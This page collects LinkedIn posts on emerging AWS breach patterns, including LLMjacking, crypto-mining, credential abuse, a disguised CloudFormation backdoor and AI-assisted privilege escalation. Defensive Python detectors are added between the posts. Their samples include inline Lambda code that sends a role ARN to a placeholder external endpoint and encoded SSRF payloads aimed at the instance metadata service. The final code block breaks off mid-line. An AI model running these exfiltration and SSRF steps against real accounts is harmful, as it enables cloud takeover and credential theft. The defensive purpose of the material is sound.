Emerging Threats in AWS Security Breaches


Summary

Emerging threats in AWS security breaches are the new and evolving ways attackers misuse cloud accounts and infrastructure, most often by exploiting exposed long-term credentials or misconfigured IAM permissions. AWS environments are increasingly targeted not only for data theft but for abuse of the resources themselves, such as invoking hosted AI models (LLMjacking) and running cryptocurrency miners on victim-paid compute.

  • Review cloud permissions: Regularly audit who has access to launch compute resources, pass roles, or attach policies to prevent attackers from abusing valid credentials.
  • Monitor API activity: Keep a close eye on unusual or excessive API usage patterns, which can signal reconnaissance, privilege escalation, or data exfiltration attempts.
  • Secure credentials promptly: Set up alerts and enforce strict controls so exposed keys or secrets cannot be used for malicious activities, including AI abuse or crypto mining.
Summarized by AI based on LinkedIn member posts
  • Jon Hencinski, Head of Security Operations at Prophet

    The Rapid7 #MDR team has been tracking a new threat group targeting AWS environments for data theft and extortion. Calling themselves Crimson Collective, this group starts by finding leaked long-term AWS access keys using tools like TruffleHog, then creates new IAM users and attaches AdministratorAccess to move laterally and escalate privileges. From there, they map the environment through extensive API calls — ListRoles, DescribeInstances, DescribeSnapshots, DescribeDBClusters — and export RDS and EBS data through S3. In some cases, they’ve even used AWS Simple Email Service from within the victim’s environment to deliver extortion notes. This campaign is another reminder that long-term credentials and overly permissive IAM policies continue to be prime targets for abuse, and that adversaries are getting better at blending in with legitimate cloud operations. 👇 Detailed analysis from the Rapid7 team: https://lnkd.in/eNyy2D2X

  • Alexander Leslie, National Security, Defense & Cyber Intelligence | Senior Advisor, Recorded Future | Government Affairs, Strategic Communications & Executive Engagement | Cybercrime, Espionage & Influence Operations

    🚨 ☁️ - New Recorded Future Insikt Group report! This is essential reading for anyone building or defending in modern hybrid, SaaS-heavy, or cloud-native environments. The report outlines a clear and uncomfortable reality: cloud environments are now central to how threat actors operate, not just a peripheral target. Please read and share with your networks!

    Our analysis highlights five key threat vectors shaping the current cloud threat landscape: cloud abuse, exploitation, endpoint misconfiguration, cloud ransomware, and credential abuse. What emerges is a picture of attackers who are not only exploiting misconfigured or vulnerable infrastructure but actively adopting cloud-native tooling and services for persistence, evasion, and impact.

    🔑 Cloud abuse, in particular, is no longer rare — it’s routine. Threat actors are standing up their own infrastructure in AWS, Azure, Google Cloud, and even lesser-known providers, blending in with legitimate traffic to host C2 nodes, phishing kits, and credential harvesting sites. In some cases, they’re compromising victim cloud environments directly to mine cryptocurrency, exfiltrate data, or abuse expensive APIs like those tied to large language models — a tactic now known as “LLMjacking.” Initial access often starts with the usual suspects: misconfigured endpoints and exposed secrets or credentials, many of which are still discovered en masse through open-source scanners and repos. Credential abuse remains a direct path to full-tenant compromise, especially in environments lacking basic protections like passwordless auth or adaptive MFA. Threat actors have shown a growing ability to escalate privileges and maintain access by manipulating identity federation, forging SAML tokens, and abusing synchronization accounts — making cloud identity a persistent battleground.

    What makes this report especially valuable is that it doesn’t stop at threat modeling. It provides practical, grounded mitigation and detection strategies aligned to each phase of the attack chain. These include monitoring for suspicious cloud API usage, spotting unauthorized data exfiltration via storage buckets, detecting anomalous access patterns, and reinforcing controls over third-party and federated identities. It also urges organizations to revisit assumptions around visibility — many cloud compromises go unnoticed until the financial or operational damage is done, and native logging alone isn’t enough to catch sophisticated misuse.

    What’s most striking, though, is the strategic shift underway. Threat actors increasingly rely on cloud infrastructure not just as a target, but as a core part of their kill chain. As adoption accelerates, the question isn’t if cloud infrastructure will be targeted — it’s how much of your detection, logging, and identity controls are ready for when it is. Because at this stage, the cloud isn’t just someone else’s computer — it’s someone else’s kill chain.

  • Peleg Cabra, Cybersecurity | Director of Product Marketing | Team8

    LLMjacking in the wild: how threat actors exploit AI using compromised AWS NHIs. Our latest research at Entro Security demonstrates the alarming speed at which threat actors capitalize on exposed NHIs to abuse LLMs like DeepSeek, Claude and GPT. Our security researchers intentionally leaked functional AWS keys across public platforms and monitored their activity:
    - 17 minutes: the average time it took for attackers to find and probe the exposed keys. The fastest attempt happened in less than 9 minutes.
    - Reconnaissance first: attackers didn’t immediately run AI workloads. Instead, they first enumerated available models, checked cloud spend, and assessed which LLM models could be accessed.
    - Hundreds of attempts to invoke models: once they mapped out the AWS keys’ capabilities, threat actors tried to generate content, effectively attempting to turn our AWS environment into their own AI resource.
    This research confirms that stolen NHIs are actively sought, tested, and systematically abused for malicious AI activity. Securing them is not a future concern, it’s a present reality. If your NHIs are compromised, attackers will find them and they won’t stop at reconnaissance. Read the full research ⬇️
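Both the Crimson Collective chain in Jon Hencinski's post (leaked long-term key, CreateUser, AttachUserPolicy with AdministratorAccess) and the LLMjacking sequence in Peleg Cabra's post (model enumeration and spend checks, then a burst of InvokeModel attempts) are visible in CloudTrail as ordered events from one principal. The following is an added example of sequence detection over CloudTrail records; it is not code from Rapid7, Entro Security or the posts' authors. The records are constructed for the example, the one-hour window and the five-attempt threshold are assumed tuning values, and it assumes Bedrock InvokeModel calls are present in the trail being searched.

```python
"""Sequence detections over CloudTrail records (added example; constructed events).

Rule 1 (Crimson Collective pattern): a long-term user key (AKIA...) creates an IAM
user and attaches AdministratorAccess to it within an hour.
Rule 2 (LLMjacking pattern): a principal enumerates Bedrock models / checks spend,
then fires a burst of InvokeModel calls, successful or AccessDenied.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"
RECON_EVENTS = {"ListFoundationModels", "GetFoundationModelAvailability",
                "ListInferenceProfiles", "GetCostAndUsage"}
WINDOW = timedelta(hours=1)
INVOKE_THRESHOLD = 5          # assumed tuning value for the example


def _ts(rec):
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _principal(rec):
    ident = rec.get("userIdentity", {})
    return ident.get("arn") or ident.get("accessKeyId") or "unknown"


def detect_admin_backdoor(records):
    """Rule 1. Keyed on accessKeyId so temporary (ASIA) session keys used by real
    admins do not fire; only successful calls are considered."""
    created, alerts = {}, []
    for rec in sorted(records, key=_ts):
        key = rec.get("userIdentity", {}).get("accessKeyId", "")
        if not key.startswith("AKIA") or rec.get("errorCode"):
            continue
        params = rec.get("requestParameters") or {}
        if rec["eventName"] == "CreateUser":
            created[(key, params.get("userName"))] = _ts(rec)
        elif rec["eventName"] == "AttachUserPolicy" and params.get("policyArn") == ADMIN_POLICY:
            t0 = created.get((key, params.get("userName")))
            if t0 is not None and _ts(rec) - t0 <= WINDOW:
                alerts.append({"rule": "iam_admin_backdoor", "key": key,
                               "new_user": params["userName"],
                               "source_ip": rec.get("sourceIPAddress")})
    return alerts


def detect_llmjacking(records):
    """Rule 2. Denied invocations count too: the probing itself is the signal."""
    first_recon, attempts = {}, defaultdict(list)
    for rec in sorted(records, key=_ts):
        p, name = _principal(rec), rec["eventName"]
        if name in RECON_EVENTS:
            first_recon.setdefault(p, _ts(rec))
        elif name.startswith("InvokeModel") and p in first_recon \
                and _ts(rec) - first_recon[p] <= WINDOW:
            attempts[p].append(bool(rec.get("errorCode")))
    return [{"rule": "llmjacking", "principal": p, "invoke_attempts": len(a),
             "denied": sum(a)} for p, a in attempts.items() if len(a) >= INVOKE_THRESHOLD]


def _rec(t, name, source, key, user, params=None, error=None):
    """Build a minimal CloudTrail-shaped record (constructed test data)."""
    return {"eventTime": t, "eventName": name, "eventSource": source,
            "userIdentity": {"type": "IAMUser", "accessKeyId": key,
                             "arn": f"arn:aws:iam::123456789012:user/{user}"},
            "requestParameters": params, "errorCode": error,
            "sourceIPAddress": "203.0.113.10"}


LEAKED, ADMIN, DS = "AKIAEXAMPLELEAKEDKEY", "ASIAEXAMPLESESSION01", "AKIAEXAMPLEDATASCI01"
SAMPLE = [
    _rec("2025-01-10T10:00:05Z", "ListRoles", "iam.amazonaws.com", LEAKED, "ci-deploy"),
    _rec("2025-01-10T10:01:10Z", "CreateUser", "iam.amazonaws.com", LEAKED, "ci-deploy",
         {"userName": "support-admin"}),
    _rec("2025-01-10T10:01:40Z", "AttachUserPolicy", "iam.amazonaws.com", LEAKED, "ci-deploy",
         {"userName": "support-admin", "policyArn": ADMIN_POLICY}),
    # same actions by an administrator on a temporary session key: not rule 1's target
    _rec("2025-01-10T10:30:00Z", "CreateUser", "iam.amazonaws.com", ADMIN, "alice",
         {"userName": "new-hire"}),
    _rec("2025-01-10T10:30:20Z", "AttachUserPolicy", "iam.amazonaws.com", ADMIN, "alice",
         {"userName": "new-hire", "policyArn": ADMIN_POLICY}),
    _rec("2025-01-10T11:00:00Z", "ListFoundationModels", "bedrock.amazonaws.com", DS, "data-sci"),
    _rec("2025-01-10T11:00:30Z", "GetCostAndUsage", "ce.amazonaws.com", DS, "data-sci"),
] + [
    _rec(f"2025-01-10T11:{i:02d}:00Z", "InvokeModel", "bedrock.amazonaws.com", DS, "data-sci",
         {"modelId": "example-model"}, "AccessDeniedException" if i % 2 else None)
    for i in range(1, 7)
]


def run(records=None):
    records = SAMPLE if records is None else records
    return detect_admin_backdoor(records) + detect_llmjacking(records)


if __name__ == "__main__":
    for alert in run():
        print(json.dumps(alert))
```

Run against the constructed sample it raises exactly two alerts: the leaked AKIA key that created `support-admin` and attached AdministratorAccess, and the `data-sci` user whose six InvokeModel attempts (three of them AccessDenied) followed model enumeration and a cost query. The administrator doing the same IAM operations on a temporary session key is deliberately out of scope for rule 1; in practice you would also exclude a small allow-list of break-glass principals rather than trust the key prefix alone.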

  • Jeff Moncrief, Sales Engineering Leader | Cloud Identity & IAM Security Advisor

    ⚠️ This is a big one folks...a new AWS Crypto-Mining Attack Vector! Compromised cloud credentials aren’t a “maybe.” They’re a certainty. AWS has just covered a familiar but still costly pattern: crypto crews using stolen AWS credentials to hijack cloud accounts and spin up infrastructure for mining and fraud. No zero-days. No fancy malware. Just valid credentials and overly powerful permissions.
    🚨 What the attackers did: Once credentials were in hand, the path was predictable:
    - Log in with compromised AWS access keys
    - Enumerate IAM to understand privilege boundaries
    - Abuse permissions to launch high-cost compute: EC2, GPUs, Spot fleets
    - Modify networking and security groups to avoid detection
    - Run crypto miners until billing alerts, or the CFO, noticed
    This isn’t advanced persistence. It’s expected behavior when IAM allows it.
    🔑 The real issue isn’t stolen credentials. Credentials get phished, leaked, logged, or reused. That’s reality. The real question is: what can those credentials actually do? If a compromised principal can:
    - RunInstances
    - Pass roles
    - Attach policies
    - Modify instance profiles
    - Bypass guardrails
    ...then the attacker wins before you even detect them.
    🧠 Why detection alone keeps failing. Most teams rely on:
    - CloudTrail alerts after resources are created
    - Cost anomaly detection after spend explodes
    - Manual IAM reviews that drift over time
    ...That’s all reactive. By the time you see the alert, the permissions already allowed the damage.
    🛑 How to stop this class of attack. You have two real options:
    1. By hand:
    - Identify privileged cloud permissions: compute launch, role pass, policy attach, network mutation
    - Enforce default deny on those actions
    - Require explicit, time-bound approval for use
    - Continuously re-audit as policies and services change
    ...Effective, but painful to scale.
    2. Automated: a Cloud Permissions Firewall. Sonrai Security’s Cloud Permissions Firewall:
    - Identifies which permissions are truly privileged
    - Enforces guardrails at the permission layer
    - Blocks abuse even when credentials are valid
    - Enables just-in-time access instead of standing privilege
    ...So when credentials are compromised, attackers hit a wall, not a GPU fleet.
    💡 The takeaway: You don’t prevent every credential compromise. You prevent what compromised credentials are allowed to do. If someone can mine crypto, snapshot data, or escalate IAM with a single stolen key, that’s not an incident response problem. That’s an IAM architecture problem.
    👀 If you haven’t reviewed who can launch compute, pass roles, or attach policies lately, this is your reminder. Happy to walk through what this looks like manually, or how teams automate it with a Cloud Permissions Firewall. Details directly from AWS: https://lnkd.in/eyHHcdZr #AWS #IAM #CloudSecurity #CloudIdentity #CryptoMining #TheyJustLogin

  • Victor GRENU, Independent AWS Cloud Security Architect

    A few months ago, we found a malicious AWS CloudFormation template trying to breach a customer's AWS account. It was disguised as “AWS Support for Fargate”. Here’s what it’s really up to:
    1. Grants itself administrator-level permissions via a fake support IAM role
    2. Deploys a Lambda function (in-line) to exfiltrate the role ARN to an external API Gateway endpoint
    3. Invokes itself using an AWS CloudFormation CustomResource
    📘 Blue team tips
    - Always review the IAM roles, policies, and external calls in any template.
    - Use IAM Access Analyzer to verify external trust relationships.
    - Don’t blindly trust anything labeled “AWS Support” — verify it first!
    - Report to AWS Security teams ASAP.
    📕 Red team tips
    - The malicious actor is identified by the AWS account ID in the AssumeRole policy.
    - Consider flooding the API endpoint with randomly generated payloads using fake IAM role ARNs.
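The three behaviours in the post (a role trusting an outside account and carrying AdministratorAccess, inline Lambda code that phones an external endpoint, and a custom resource that makes the function run at stack creation) can all be caught by reading the template before anyone deploys it. The following is an added example of such a review script; it is not the author's tooling. The template it scans is constructed to mirror the described pattern: the external account ID `111122223333`, the `execute-api` URL and the resource names are placeholders, not the real indicators from the incident.

```python
"""Static review of a CloudFormation template for the three behaviours in the post
(added example; the template below is constructed, account IDs and URLs are placeholders)."""
import json
import re

ACCOUNT_RE = re.compile(r"\b(\d{12})\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+[^\s\"'\\]*")
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _trust_findings(name, trust_doc, allowed_accounts):
    """Flag AssumeRole trust granted to '*' or to any account outside the allow-list."""
    out = []
    for st in _as_list(trust_doc.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal", {})
        if principal == "*":
            out.append((name, "role can be assumed by anyone (Principal '*')"))
            continue
        for p in _as_list(principal.get("AWS", [])):
            m = ACCOUNT_RE.search(p)
            if p == "*" or m is None or m.group(1) not in allowed_accounts:
                out.append((name, f"trust policy lets external principal {p} assume the role"))
    return out


def scan_template(template, own_account, trusted_accounts=()):
    """Return (logical_id, finding) pairs for roles, inline Lambda code and custom resources."""
    allowed = {own_account, *trusted_accounts}
    resources = template.get("Resources", {})
    findings = []
    for name, res in resources.items():
        rtype, props = res.get("Type", ""), res.get("Properties", {})
        if rtype == "AWS::IAM::Role":
            findings += _trust_findings(name, props.get("AssumeRolePolicyDocument", {}), allowed)
            if ADMIN_POLICY in props.get("ManagedPolicyArns", []):
                findings.append((name, "role attaches AdministratorAccess"))
            for pol in props.get("Policies", []):
                for st in _as_list(pol.get("PolicyDocument", {}).get("Statement", [])):
                    if st.get("Effect") == "Allow" and "*" in _as_list(st.get("Action", [])):
                        findings.append((name, f"inline policy {pol.get('PolicyName')} allows Action '*'"))
        elif rtype == "AWS::Lambda::Function":
            # inline (ZipFile) code ships inside the template: every outbound URL is reviewable
            for url in URL_RE.findall(props.get("Code", {}).get("ZipFile", "")):
                findings.append((name, f"inline function code contacts {url}"))
        elif rtype == "AWS::CloudFormation::CustomResource" or rtype.startswith("Custom::"):
            token = props.get("ServiceToken")
            target = token.get("Fn::GetAtt", [None])[0] if isinstance(token, dict) else None
            if target in resources:
                findings.append((name, f"custom resource runs {target} during stack create/update"))
    return findings


SAMPLE_TEMPLATE = {
    "AWSTemplateFormatVersion": "2010-09-09",
    "Description": "AWS Support for Fargate",
    "Resources": {
        "SupportRole": {"Type": "AWS::IAM::Role", "Properties": {
            "RoleName": "AWSSupportFargateRole",
            "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [{
                "Effect": "Allow", "Action": "sts:AssumeRole",
                "Principal": {"AWS": "arn:aws:iam::111122223333:root"}}]},
            "ManagedPolicyArns": [ADMIN_POLICY]}},
        "ReportFunction": {"Type": "AWS::Lambda::Function", "Properties": {
            "Runtime": "python3.12", "Handler": "index.handler",
            "Role": {"Fn::GetAtt": ["SupportRole", "Arn"]},
            "Code": {"ZipFile": (
                "import json, urllib.request\n"
                "def handler(event, context):\n"
                "    body = json.dumps({'arn': event['ResourceProperties']['RoleArn']}).encode()\n"
                "    urllib.request.urlopen('https://abcd1234.execute-api.us-east-1.amazonaws.com/prod/collect', body)\n")}}},
        "Trigger": {"Type": "AWS::CloudFormation::CustomResource", "Properties": {
            "ServiceToken": {"Fn::GetAtt": ["ReportFunction", "Arn"]},
            "RoleArn": {"Fn::GetAtt": ["SupportRole", "Arn"]}}},
    },
}


if __name__ == "__main__":
    for logical_id, finding in scan_template(SAMPLE_TEMPLATE, own_account="123456789012"):
        print(f"{logical_id}: {finding}")
```

Note that the exfiltration endpoint lives on `amazonaws.com`, so an allow-list keyed on the AWS domain would wave it through; the script therefore reports every URL embedded in inline code and leaves the judgement to the reviewer. The trust-policy finding carries the foreign account ID, which is the indicator the red-team tip refers to.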

  • Ben F., Research

    ⚠️ New research published on Ctrl-Alt-Intel today: Multiple cryptocurrency organisations compromised by a suspected DPRK-affiliated threat actor ⚠️ https://lnkd.in/gTRT-Wxh
    The campaign targeted multiple avenues of the crypto supply chain: staking platforms, exchange software providers, and the exchanges themselves. We observed standard CVEs used for initial access (React2Shell), but the AWS post-exploitation tradecraft was particularly interesting:
    - Valid AWS tokens used to enumerate S3, RDS, Lambda, EKS, ECR, and Secrets Manager
    - Databases deliberately exposed to the internet for direct access
    - Terraform state files targeted for credentials
    - Lateral movement from AWS into Kubernetes clusters
    - Docker images exfiltrated from crypto-exchange container registries
    - AWS Secrets Manager pillaged for plaintext secrets
    Check out the blog for the full analysis! The good news? Hunt Intelligence, Inc. archived a snapshot of one of the threat actor’s exposed open directories over a month ago, during active exploitation 👏
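Terraform state files are targeted because `terraform.tfstate` stores resource attributes in the clear, including database master passwords, IAM secret keys and Secrets Manager values, regardless of whether the provider marks them sensitive. The following is an added example, not from the Ctrl-Alt-Intel research, of triaging a leaked state file the way an attacker (or a defender assessing exposure) would: it walks every attribute, reports secret-looking values redacted, surfaces access key IDs (which identify the owning account), and flags RDS instances marked publicly accessible, which ties to the exposed-database item above. The state document is constructed and every value in it is a placeholder.

```python
"""Find what an attacker would pull from a leaked Terraform state file
(added example; the state below is constructed, all values are placeholders)."""
import json
import re

SENSITIVE_KEY = re.compile(r"password|secret|private_key|token|credential", re.I)
ACCESS_KEY_ID = re.compile(r"(?:AKIA|ASIA)[A-Z2-7]{16}")
MIN_LEN = 8   # assumed: shorter strings under a sensitive-looking key are usually flags or labels


def _walk(obj, path=""):
    """Yield (dotted path, scalar) for every leaf of a nested attributes object."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk(v, f"{path}[{i}]")
    else:
        yield path, obj


def scan_tfstate(state):
    """Return findings: plaintext secrets, access key IDs (they name the account),
    and RDS instances reachable from the internet."""
    findings = []
    for res in state.get("resources", []):
        rid = f"{res.get('module', 'root')}.{res['type']}.{res['name']}"
        for inst in res.get("instances", []):
            attrs = inst.get("attributes", {})
            for path, value in _walk(attrs):
                if not isinstance(value, str):
                    continue
                if ACCESS_KEY_ID.fullmatch(value):
                    findings.append({"resource": rid, "attribute": path,
                                     "kind": "access_key_id", "preview": value})
                elif len(value) >= MIN_LEN and SENSITIVE_KEY.search(path):
                    findings.append({"resource": rid, "attribute": path,
                                     "kind": "plaintext_secret", "preview": value[:4] + "****"})
            if res["type"] in ("aws_db_instance", "aws_rds_cluster") and attrs.get("publicly_accessible"):
                findings.append({"resource": rid, "attribute": "publicly_accessible",
                                 "kind": "internet_exposed_db", "preview": attrs.get("address", "")})
    return findings


SAMPLE_STATE = {  # constructed Terraform state (format version 4); nothing here is a real secret
    "version": 4, "terraform_version": "1.9.0",
    "resources": [
        {"mode": "managed", "type": "aws_db_instance", "name": "exchange", "instances": [{"attributes": {
            "identifier": "exchange-prod", "engine": "postgres", "username": "app",
            "password": "Pr0d-Db-Example-Only", "publicly_accessible": True,
            "address": "exchange-prod.abc123.us-east-1.rds.amazonaws.com"}}]},
        {"mode": "managed", "type": "aws_iam_access_key", "name": "deployer", "instances": [{"attributes": {
            "user": "deployer", "id": "AKIAEXAMPLEDEPLOYER2",
            "secret": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}}]},
        {"mode": "managed", "type": "aws_secretsmanager_secret_version", "name": "api", "instances": [{"attributes": {
            "secret_string": json.dumps({"api_token": "tok_example_0123456789"})}}]},
        {"mode": "managed", "type": "aws_s3_bucket", "name": "images", "instances": [{"attributes": {
            "bucket": "exchange-docker-images", "tags": {"token_budget": "12"}}}]},
    ],
}


if __name__ == "__main__":
    for f in scan_tfstate(SAMPLE_STATE):
        print(f"{f['kind']:20} {f['resource']}.{f['attribute']}: {f['preview']}")
```

The practical consequences follow directly: state belongs in a backend with encryption and tight IAM on the bucket or table, never in a repository or an image layer, and any secret that ever passed through state should be rotated when the state is known to have leaked, since the file records the value even after the resource is changed in code.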

  • Zlatan H., Securing Systems Before They're Broken | Offensive Security | Ethical Hacking | Cyber Risk Advisor

    🔐 Deep Dive into AWS Pentesting: Methodology, Real Scenarios & Essential Commands
    Staying ahead of cloud security threats requires more than just theoretical knowledge—it demands practical, scenario-based understanding. I just explored an excellent, detailed guide on AWS penetration testing that breaks down the entire process from reconnaissance to exploitation and reporting. This is a must-read for Security Engineers, Cloud Architects, DevOps professionals, and anyone responsible for AWS infrastructure. Here’s what the comprehensive guide covers:
    ✅ The AWS Pentesting Methodology: A structured approach aligned with industry standards.
    ✅ Pre-Engagement & Legalities: The crucial first step—ensuring authorized testing.
    ✅ Detailed Reconnaissance: Techniques to map the AWS attack surface (assets, S3 buckets, CloudTrail misconfigurations).
    ✅ Exploitation Scenarios: Hands-on walkthroughs for common vulnerabilities:
    - Exposed IAM keys & credential compromise.
    - Privilege escalation via misconfigured IAM policies.
    - S3 bucket enumeration & data exfiltration.
    - SSRF attacks leading to instance metadata exposure.
    ✅ Post-Exploitation: Maintaining access, pivoting, and internal network mapping.
    ✅ Essential Toolset: Practical commands for tools like awscli, Pacu, S3Scanner, CloudFrunt, and Metasploit.
    ✅ Reporting & Remediation: Turning findings into actionable intelligence for defenders.
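The "SSRF to instance metadata" scenario in the list works because an application fetches an attacker-supplied URL from inside the instance, and `169.254.169.254` answers with the instance role's temporary credentials. String filters on that literal are routinely bypassed with other encodings of the same address. The following is an added example of the target check a web application should apply before fetching; it is not from the guide the post summarises, and the blocked ranges and the injected `resolve` interface are assumptions for the example. It goes beyond the single IMDS address in the text: decimal, hex, octal, short-dotted, IPv6 IMDS and IPv4-mapped IPv6 forms are all normalised before the range check.

```python
"""Reject SSRF targets that reach the EC2 instance metadata service, whatever
the attacker's encoding of the address (added example, not from the guide the
post summarises; the blocked ranges are an assumed policy)."""
import ipaddress
from urllib.parse import urlsplit

BLOCKED = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",     # IMDS (169.254.169.254) and all IPv4 link-local
    "fd00:ec2::254/128",  # IPv6 IMDS endpoint
    "fe80::/10", "127.0.0.0/8", "::1/128", "0.0.0.0/8",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
)]


def _inet_aton(host):
    """Parse the legacy forms libc accepts: decimal (2852039166), hex (0xa9fea9fe),
    octal (0251.0376.0251.0376) and short dotted (169.254.43518)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(host)
    vals = []
    for p in parts:
        if p.lower().startswith("0x"):
            vals.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            vals.append(int(p, 8))
        elif p.isdigit():
            vals.append(int(p))
        else:
            raise ValueError(host)
    *head, last = vals
    width = 5 - len(parts)             # bytes the last component fills, as inet_aton does
    if any(v > 255 for v in head) or last >= 256 ** width:
        raise ValueError(host)
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << (8 * width)) | last)


def _literal(host):
    """Return an address object if `host` is any literal IP form, else None."""
    for parser in (ipaddress.ip_address, _inet_aton):
        try:
            return parser(host)
        except ValueError:
            continue
    return None


def _blocked(ip):
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped          # ::ffff:169.254.169.254 is still IMDS
    return any(ip in net for net in BLOCKED)


def classify_target(url, resolve=None):
    """'blocked', 'allowed' or 'unresolved'. `resolve(host) -> [addr, ...]` is an
    injected resolver (assumed interface); connect to the vetted address afterwards
    rather than re-resolving, or a rebinding attacker swaps the answer."""
    host = urlsplit(url).hostname
    if not host:
        return "blocked"
    ip = _literal(host)
    if ip is not None:
        return "blocked" if _blocked(ip) else "allowed"
    if resolve is None:
        return "unresolved"
    answers = [ipaddress.ip_address(a) for a in resolve(host)]
    if not answers or any(_blocked(a) for a in answers):
        return "blocked"
    return "allowed"


SAMPLE_PAYLOADS = [  # constructed SSRF payloads, all aimed at IMDS except the last two
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://2852039166/latest/meta-data/", "http://0xa9fea9fe/latest/meta-data/",
    "http://0251.0376.0251.0376/latest/meta-data/", "http://169.254.43518/latest/meta-data/",
    "http://[fd00:ec2::254]/latest/meta-data/", "http://[::ffff:169.254.169.254]/",
    "https://203.0.113.7/webhook", "https://hooks.example.com/notify",
]

if __name__ == "__main__":
    for u in SAMPLE_PAYLOADS:
        print(f"{classify_target(u):10} {u}")
```

The validator is one half of the fix; the other is on the instance. With IMDSv2 required (`aws ec2 modify-instance-metadata-options --http-tokens required --http-put-response-hop-limit 1`), a credential fetch needs a prior PUT to obtain a session token, which a plain GET-based SSRF cannot issue, so the exploit chain in the guide stops at the first hop even if the validator is bypassed.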

  • John Bruggeman CISSP, vCISO at CBTS and OnX. I make Cybersecurity and Cyber risk understandable, CISSP, Advisory Board, Speaker, Treasurer InfraGard Cincinnati

    An attacker gained access to an AWS environment via credentials stored in an S3 bucket. That's not the surprise; the surprise is that they were able to leverage that test account to *full* admin access in 10 minutes, with the help of AI. Kudos to Sysdig threat hunters for catching the attacker breaking in. The details are interesting; here are a few excerpts from the story from The Register.
    "The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources," Sysdig's threat research director Michael Clark and researcher Alessandro Brucato said in a blog post about the cloud intrusion.
    So the attacker had some skills and help from an LLM to speed up the attack. Clearly, *DO NOT STORE ACCESS KEYS* in public buckets. What else can we learn from this? The attacker "achieved privilege escalation through Lambda function code injection, abusing the compromised user's UpdateFunctionCode and UpdateFunctionConfiguration permissions". So, even though you think you've limited your risk, always implement the principle of least privilege. We knew this was coming, but this time we have evidence that it has happened. Attackers are relying on AI to help them at almost every stage in the attack chain, and it is a matter of time before criminals can fully automate attacks at scale. What can you do?
    1) Make sure you follow basic cybersecurity hygiene, by not storing credentials in publicly available S3 buckets, PLEASE!
    2) Practice the principle of least privilege, i.e. only grant the privs needed to do that job, then either revoke the privs or access after it is needed.
    3) Monitor your environment, 24x7, 365 days a year. If you can't do it, hire someone who can.
    For more details you can read the article at the link below: https://lnkd.in/eJHecchb
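Jeff Moncrief's post asks "what can those credentials actually do?" and lists the primitives that turn a stolen key into a mining fleet (RunInstances, PassRole, policy attach, network mutation); John Bruggeman's post shows a "test account" whose UpdateFunctionCode and UpdateFunctionConfiguration permissions were enough to reach admin. The following is an added example of answering that question from policy documents alone; it is not Sonrai's product, Sysdig's tooling or either author's code. The principals and policies are constructed, the privileged-action list is an assumed starting set, and the evaluator deliberately ignores Resource and Condition (an Allow counts as a hit and scoping is reviewed by hand), which is conservative in the right direction for an audit.

```python
"""Answer "what can this credential actually do?" for the actions behind the
mining and Lambda-injection cases above (added example; principals and policies
below are constructed)."""
import fnmatch

PRIVILEGED_ACTIONS = {
    "ec2:RunInstances": "launch compute (GPU / Spot mining fleets)",
    "ec2:AuthorizeSecurityGroupIngress": "open network paths",
    "ec2:ModifySnapshotAttribute": "share EBS snapshots to another account",
    "iam:PassRole": "hand a role to a resource you control",
    "iam:CreateUser": "create a backdoor user",
    "iam:CreateAccessKey": "mint keys for any user",
    "iam:AttachUserPolicy": "attach AdministratorAccess",
    "iam:PutUserPolicy": "write an inline admin policy",
    "lambda:UpdateFunctionCode": "run your code under the function's role",
    "lambda:UpdateFunctionConfiguration": "swap handler, env or role of a function",
    "rds:ModifyDBInstance": "set PubliclyAccessible / change master password",
}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _matches(pattern, action):
    """IAM action matching: case-insensitive with * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def _effect(stmt, action):
    """'Allow' / 'Deny' if the statement covers `action`, else None. Resource and
    Condition are not modelled: an Allow counts and scoping is reviewed by hand."""
    if "NotAction" in stmt:   # covers everything except the listed actions
        covered = not any(_matches(p, action) for p in _as_list(stmt["NotAction"]))
    else:
        covered = any(_matches(p, action) for p in _as_list(stmt.get("Action", [])))
    return stmt.get("Effect") if covered else None


def allows(policies, action):
    """Explicit Deny wins over any Allow, as in IAM evaluation."""
    allowed = denied = False
    for doc in policies:
        for stmt in _as_list(doc.get("Statement", [])):
            eff = _effect(stmt, action)
            allowed |= eff == "Allow"
            denied |= eff == "Deny"
    return allowed and not denied


def audit(principals):
    """principal name -> sorted list of privileged actions it can call."""
    report = {}
    for name, policies in principals.items():
        hits = sorted(a for a in PRIVILEGED_ACTIONS if allows(policies, a))
        if hits:
            report[name] = hits
    return report


SAMPLE_PRINCIPALS = {  # constructed; each value is the list of policy documents on the principal
    "user/ci-deploy": [{"Statement": [
        {"Effect": "Allow", "Action": ["ec2:*", "iam:PassRole"], "Resource": "*"}]}],
    "user/test-account": [{"Statement": [
        {"Effect": "Allow", "Resource": "*", "Action": [
            "lambda:GetFunction", "lambda:UpdateFunctionCode",
            "lambda:UpdateFunctionConfiguration", "s3:GetObject"]}]}],
    "role/auditor": [  # NotAction "read-only" policies are a classic over-grant
        {"Statement": [{"Effect": "Allow", "NotAction": ["iam:*", "organizations:*"], "Resource": "*"}]},
        {"Statement": [{"Effect": "Deny", "Action": ["ec2:RunInstances", "lambda:Update*"], "Resource": "*"}]}],
    "user/dev-readonly": [{"Statement": [
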